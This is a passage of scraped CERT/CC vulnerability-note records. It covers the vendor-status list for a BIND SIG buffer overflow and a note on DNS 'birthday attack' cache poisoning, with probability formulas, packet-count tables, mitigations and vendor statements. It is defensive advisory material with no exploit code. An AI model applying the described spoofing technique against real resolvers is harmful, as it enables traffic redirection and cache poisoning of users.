Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Putty Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RADIUSClient Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RSA Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Riverstone Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SGI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SSH Communications Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sendmail Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sophos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Symantec Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 01, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### The SCO Group (SCO UnixWare) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### WU-FTPD Development Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### XTRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Xerox Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\nView all 102 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://www.secunia.com/advisories/9856/>\n\n### Acknowledgements\n\nThanks to ISS for reporting this vulnerability.\n\nThis document was written by Jason A Rafail.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1219](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1219>) \n---|--- \n**CERT Advisory:** | [CA-2002-31 ](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 30.38 \n**Date Public:** | 2002-11-11 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated: ** | 2004-10-18 14:58 UTC \n**Document Revision: ** | 18 \n", "modified": "2004-10-18T14:58:00", "published": "2002-11-13T00:00:00", "id": "VU:852283", "href": "https://www.kb.cert.org/vuls/id/852283", "type": "cert", "title": "Cached malformed SIG record buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-0029", "CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nVarious implementations of DNS services may allow multiple simultaneous queries for the same resource record, allowing an attacker to apply probabilistic techniques to improve their odds of successful DNS spoofing.\n\n### Description \n\nSome implementations of DNS services contain a vulnerability whereby multiple requests for the same resource record (RR) will generate multiple outstanding queries for that RR. As a result, it is possible for an attacker to apply a '[birthday attack](<http://mathworld.wolfram.com/BirthdayAttack.html>)' technique to dramatically improve the probability of a successful DNS spoofing attack. When performed against a caching nameserver, this can result in cache poisoning; however, similar techniques could be applied to some stub resolvers as well.\n\nThe only distinction between this attack and the traditional brute-force approach (1 query with multiple spoofed replies) is the generation of multiple simultaneous queries. The attacker need not sniff any packets between the victim resolver and the legitimate nameservers for the RR being spoofed. An attacker's success against any particular resolver instance will be probabilistic in nature, with a persistent attacker always being able to achieve a reasonable probability of success given enough attempts. \n \nBy rapidly generating multiple queries for an RR to a vulnerable resolver, the attacker can induce a condition whereby the vulnerable resolver has multiple open queries for that RR. The attacker then sends a number of spoofed responses to the vulnerable resolver. Given the right combination of open queries and spoofed responses, the attacker can achieve a high probability of success with far fewer packets (by several orders of magnitude) than the traditional brute-force approach would require. \n \nThis attack is quite effective against caching nameservers that provide recursive services. Recent research by Gummadi, Saroiu, and Gribble [GUMMADI] indicates that a large proportion of nameservers are configured to provide recursive services to the Internet at large, thereby laying them open to this kind of attack. \n \nThe specific number of packets required to exploit any particular DNS resolver vary by implementation, but the following table lists a few of the more common scenarios found in a number of implementations \n \n\n\n| **If the attacker has to guess...**| **...and is limited to the following number of open requests...**| **...it will take the following number of packets to achieve a 50% success rate** \n(includes both requests and responses) \n---|---|--- \nTID only (16bits)| 1| 32.7 k (215) \nTID only (16bits)| 4| 10.4 k \nTID only (16bits)| 200| 427 \nTID only (16bits)| unlimited| 426 \nTID and port (32 bits)| 1| 2.1 billion (231) \nTID and port (32 bits)| 4| 683 million \nTID and port (32 bits)| 200| 15 million \nTID and port (32 bits)| unlimited| 109 k \n_Table 1: Number of packets required to reach 50% success probability for various numbers of open queries_ \nAs expected, the traditional brute-force case where the attacker tries to guess the transaction ID or TID/port pair based on a single open request requires the attacker to search half the search space (15 or 31 bits, respectively) to achieve a 50% probability of success. However, when the attacker is able to induce the resolver into generating multiple simultaneous requests, the total number of packets required falls off rapidly. \n \nThere are, of course, more effective methods to achieve DNS spoofing in certain cases, including sniffing query packets directly or the predictable transaction ID issues discussed in [CA-1997-22](<http://www.cert.org/advisories/CA-1997-22.html>) \"BIND - the Berkeley Internet Name Daemon\". Additionally, Michal Zalewski's paper \"Strange Attractors and TCP/IP Sequence Number Analysis\" [ZALEWSKI] describes a method for analyzing the predictability of transaction IDs which we believe could be extended to analyze Transaction ID / UDP port pairs as well. Zalewski's paper was also discussed in [CA-2001-09](<http://www.cert.org/advisories/CA-2001-09.html>) \"Statistical Weaknesses in TCP/IP Initial Sequence Numbers\". \n \nThe 'birthday attack' method described here appears to be reasonably well known in the DNS developer community, but we have been unable to find significant public discussion of it and are thus documenting it here. \n \n**Further discussion of the probability calculations** \n \nAssume that the transaction IDs generated by the vulnerable resolver are unpredictable by the attacker (if they're not, then the attack is far simpler than what we describe here; see [CA-1997-22](<http://www.cert.org/advisories/CA-1997-22.html>) for more). The attacker does not know what the transaction IDs are, but can control how many transaction IDs the vulnerable resolver has open for a particular query at a given time by generating a series of otherwise legitimate queries. (The total number of transaction IDs open on the vulnerable resolver does not factor into this -- only the transaction IDs resulting from the attacker's queries count.) \n \nLet \n \n_m_ = the number of possible transaction ID / UDP port combinations \n \n_q_ = the number of open queries initiated by the attacker \n \n_r_ = the number of bogus replies generated by the attacker \n \nNote that if the UDP ports are predictable, _m_ _= 2__16_. If they are not predictable, _m__ = 2__32_. Of course, if both the transaction IDs and UDP ports are predictable, _m_ approaches _1_. \n \nThe goal for the attacker, therefore, is to find the smallest possible sum of (_q + r_) with a maximum probability of success. \n \nThe first bogus reply sent by the attacker will have a probability of success given by \n \n_P__1__ = q / m_ \n \nThe attacker does not need to care whether any particular reply was successful or not. The only thing the attacker has to keep track of is what IDs have been sent in the bogus replies so there will not be any duplicates. Thus, since the attacker knows what the ID was in the first reply and doesn't want to repeat IDs, he only has a pool of (_m - 1_) IDs to pick from on the second reply. Therefore, the second reply has a probability of success of \n \n_P__2 __= q / (m - 1)_ \n \nLikewise, for each successive iteration, the number of possible IDs the attacker will pick from shrinks by 1. In the generic case, \n \n_P__n __= q / (m - (n - 1)) _ \n \nEach _P__n_ represents the probability of success in the _n_th iteration, independently of all previous iterations. We can therefore represent the probability of a miss in the _n_th iteration as Qn where \n \n_Q__n__ = 1 - P__n__ = 1 - (q / (m - (n - 1))) _ \n \nThe cumulative probability of having missed in all iterations up to and including the _n_th iteration is \n \n_CumulativeMiss__n__ = Q__1__*Q__2__*...*Q__n_ \n \nand therefore the cumulative probability of at least one success with _r_ bogus replies is \n \n_CumulativeHit__r__ = 1 - CumulativeMiss__r_ \n \nThus we can calculate the probability of compromise given _q_ queries and _r_ replies. We do this by iteratively fixing _q_ and incrementing _r_ until we reach the desired _P__r_. To find the optimal combination of _q_ and _r_, we repeat the process for a number of values of _q_. \"Optimal\" is defined as the minimum sum of (_q + r_). \n \nWhen one considers cases where _q &gt; 1_, it quickly becomes evident that the attacker's advantage grows significantly with relatively small numbers of queries (_q &lt;&lt; m_). For example, performing the calculations as described above for _m__ = 2__16_, the attacker's probability of success reaches the 50% mark with as few as (_q + r_) ~= 425 packets. \n \n**References:** \n \n[GUMMADI] Krishna P. Gummadi, Stefan Saroiu, and Steven D. Gribble, \"King: Estimating Latency between Arbitrary Internet End Hosts\", [http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf](<http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf>) \n \n[ZALEWSKI] Michal Zalewski, \"Strange Attractors and TCP/IP Sequence Number Analysis\", <http://razor.bindview.com/publish/papers/tcpseq.html>\n\n[](<https://kb.cert.org/static-bigvince-prod-kb-eb/vulcoord/files/457875_attach_advisory-CAIS-vagner.pdf> \"advisory-CAIS-vagner.pdf\" ) \n \n### Impact \n\nAn attacker could leverage this vulnerability to remotely spoof DNS responses, which may lead to DNS cache poisoning. \n \n--- \n \n### Solution \n\nApply a patch from your vendor. \n \n--- \n \nDisable recursion on any nameserver responding to DNS requests made by untrusted systems. As mentioned in [\"Securing an Internet Name Server\"](<http://www.cert.org/archive/pdf/dns.pdf>): \n \n`Disabling recursion puts your name servers into a passive mode, telling them never to send queries on behalf of other name servers or resolvers. A totally non-recursive name server is protected from cache poisoning, since it will only answer queries directed to it. It doesn't send queries, and hence doesn't cache any data. Disabling recursion can also prevent attackers from bouncing denial of services attacks off your name server by querying for external zones. ` \nNon-recursive nameservers should be much more resistant to exploitation of the server vulnerabilities listed above. \n \n--- \n \n### Vendor Information\n\n457875\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: October 29, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server. \n\nThis is fixed in Security Update 2002-11-21.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n` \n`Security Update 2002-11-21 is now available. It contains BIND version \n8.3.4 \nto address multiple potential vulnerabilities. \n` \n`CVE IDs: CAN-2002-1219, CAN-2002-1220, CAN-2002-1221, CAN-2002-0029 \n` \n`Description: Several of these vulnerabilities may allow remote \nattackers \nto execute arbitrary code with elevated privileges. The other \nvulnerabilities \ncould allow remote attackers to disrupt the normal operation of DNS \nname service \nrunning on servers. \n` \n`Further information is available at: \n``<http://www.cert.org/advisories/CA-2002-31.html>`` \n``<http://www.kb.cert.org/vuls/id/457875>`` \n` \n`Affected systems: Systems that have enabled BIND and are using \nBIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3. \n` \n`Mitigating Factors: BIND is not enabled by default on Mac OS X or Mac \nOS X Server \n` \n`System requirements: Mac OS X 10.2.2 \n` \n`If BIND is enabled on Mac OS X systems prior to 10.2.2, the \nrecommendation \nis to either upgrade to Mac OS X 10.2 Jaguar then apply this Security \nUpdate, \nor to update BIND to version 8.3.4 from the ISC site at: \n``<http://www.isc.org/products/BIND/bind8.html>`` \n` \n`Security Update 2002-11-21 may be obtained from: \n` \n` * Software Update pane in System Preferences (for 10.2.2 or later) \n` \n` * Apple's Software Downloads web site: \n``<http://www.info.apple.com/kbnum/n120169>`` \n` \n` To help verify the integrity of Security Update 2002-11-21 from the \nSoftware Downloads web site, the download file is titled: \nSecurityUpd2002-11-21.dmg \nIts SHA-1 digest is: 9137fc5c1b8922475939ec93ab638494ff6e69be \n` \n`Information will also be posted to the Apple Support website: \n``<http://docs.info.apple.com/article.html?artnum=61798>`` \n` \n`This message is signed with Apple's Product Security PGP key, and \ndetails are available at: \n``<http://www.apple.com/support/security/security_pgp.html>`` \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.3 \n` \n`iQEVAwUBPd62ayFlYNdE6F9oAQH3DQf+PJNRB5NlLZim8i7hr0ef/obrjGrQ/PNL \nmpQ0bdgB7huFpUYw52YJcjIIFeI6XSgyP/QEEFfApy98y5CuEDXnC+raMniokD6D \nL4A25nhRByyxOC5lziKjQKLDWIEktQGXSHYr9cq7oIuo66gAxdQbZrT/brubu9sI \np/4g7sO1CuD5P/31RZUdHizG5lbN8dRGNgeh59FYQhpdYMbflrSolFL0FyxVc6aQ \nUwYbdnlt+wPiDqqWGL+YKv7GXV/XBk29mty6sLHqExx2bL8CH8ttUpZcFa8H+8VM \nyBXHJ0pnsCPrX+Q32o93ibm3HASXG+JcOrIC1kzvqlldSUvni1w6Kw== \n=/AHs \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Debian __ Affected\n\nNotified: October 29, 2002 Updated: July 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nDebian can't say anything about the vulnerability itself, except that since ISC refers to using tools from bind9, our bind8 packages are probably vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Fujitsu __ Affected\n\nNotified: October 29, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. is vulnerable. The relevant fix (PUF) will be announced at a later date.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### ISC __ Affected\n\nUpdated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe correct fix is \"deploy dnssec\".\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### InfoBlox __ Affected\n\nNotified: October 29, 2002 Updated: October 18, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Infoblox DNS One product is vulnerable when deployed in hostile territory with recursion enabled, for example, as a public Internet name server. See <http://www.infoblox.com/solutions/whitepapers_external.cfm> for details on how to configure the DNS One appliance to avoid this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### MetaSolv Software Inc. __ Affected\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nMetaSolv Response REF:Vulnerability Note #457875 \n\n\nThe BIND code embedded in the DNS Server (Based on ISC BIND 8.2.3) on both MetaSolv Policy Services 4.1 and 4.2 (base) are open to Vulnerability Note #457875. This also applies to the BIND 8.2.6 Base in Policy services 4.2 Service Pack 1 efix 1. This issue is being tracked by MetaSolv under Case #28233. The customer base will be advised as to the potential vulnerability, and when ISC publishes sanctioned libraries these will be applied and published as an efix on Policy Services 4.2 Service Pack 1. MetaSolv Policy Services 5.0 is based on BIND 9.2.2 rc-1 and does not demonstrate the same predilection to the vulnerability as outlined in the note.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: October 29, 2002 Updated: November 19, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Microsoft DNS Server implementation closely follows the DNS standard. DNS is an insecure protocol and until such time as the protocol describes a method for securing queries, a determined attacker could poison the cache of a DNS Server. A number of precautions in the Microsoft DNS server make this style of attack more difficult, but not impossible. Microsoft is considering additional improvements to its DNS implementation in future versions of the Microsoft DNS sever to reduce the effectiveness of attacks like this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: October 29, 2002 Updated: November 21, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNetBSD is shipped with ISC BIND nameserver (BIND8). See ISC's statement for more details.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: October 29, 2002 Updated: December 04, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOne of the features added with BIND 4.9.x-OW patches has always been the addition of unpredictable query IDs, thus making BIND 4 with these patches applied more resistant against the described attacks. The randomization of source port numbers is, however, currently left up to the operating system kernel (and thus doesn't occur on most systems). Future versions of the patches might add this functionality. \n\n\nSimilarly, the glibc resolver code on Openwall GNU/*/Linux (Owl) has been modified to use unpredictable query IDs (including in the very first version of Owl available to the public), but doesn't explicitly randomize source port numbers.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Check Point __ Not Affected\n\nNotified: October 29, 2002 Updated: November 04, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCheck Point products are Not Vulnerable (we don't employ any caching DNS code).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### GNU glibc __ Not Affected\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe GNU C library does not contain a name server; it has only a stub resolver.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Network Appliance __ Not Affected\n\nUpdated: November 19, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNetApp products are not vulnerable to this problem.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nUpdated: May 30, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this vulnerability is available from our web site: \n<http://www.xerox.com/security>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### adns __ Not Affected\n\nNotified: 